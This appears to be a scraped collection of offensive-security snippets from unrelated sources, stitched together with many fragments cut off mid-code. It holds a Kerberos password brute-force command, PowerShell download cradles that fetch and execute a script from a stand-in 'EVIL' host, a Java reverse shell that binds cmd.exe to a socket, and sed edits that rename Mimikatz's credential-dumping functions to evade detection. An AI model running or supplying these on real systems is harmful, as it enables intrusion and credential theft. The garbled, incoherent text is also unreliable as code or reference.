With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
#DISCLAIMER
#I'm not the original author of the script...
#Original git repo vanished
function String-to-ByteArray ($String)
{
$ByteArray=@()
For ( $i = 0; $i -lt ($String.Length/2); $i++ )
{
$Chars=$String.Substring($i*2,2)
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
# Uncomment below two lines to clean comments from all .ps1 files in ./
#find ./ -name "*.ps1" -exec sed -i -e '/^<#/,/^#>/d' {} \;
#find ./ -name "*.ps1" -exec sed -i -e 's/#.*$//' {} \;
sed -i -e '/^<#/,/^#>/d' Invoke-Mimikatz.ps1
sed -i -e 's/#.*$//' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCerts/GimmeCerts/g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/GimmeCreds/g' Invoke-Mimikatz.ps1
# twitterfavlinks.py - Throw back all your favorites that contain a url. Get any applicable redirects. Note there are Twitter API
# limits, so if you have a gazillion favorites, you probably won't get them all. YMMV
#
# Author: @curi0usJack
#
# Dependencies:
# Tweepy: sudo pip install tweepy
# Twitter API access. Set up here: https://apps.twitter.com/
import tweepy
#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-available/), put this statement somewhere near the bottom
#
# Include /etc/apache2/redirect.rules
#
#!/bin/bash
# Nmap can crash when scanning large ranges
# To use this script, start your scan with whatever
# nmap options you want making sure you use -oA <filename>
# or -oG <filename> (you need the gnmap file) then cancel
# the scan. replace <filename> below and run this script.
# It will also record when it failed to a file called failed.txt
until nmap --resume <filename>.gnmap
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# A similar approach to smbexec but executing commands through WMI.
# Main advantage here is it runs under the user (has to be Admin)
# account, not SYSTEM, plus, it doesn't generate noisy messages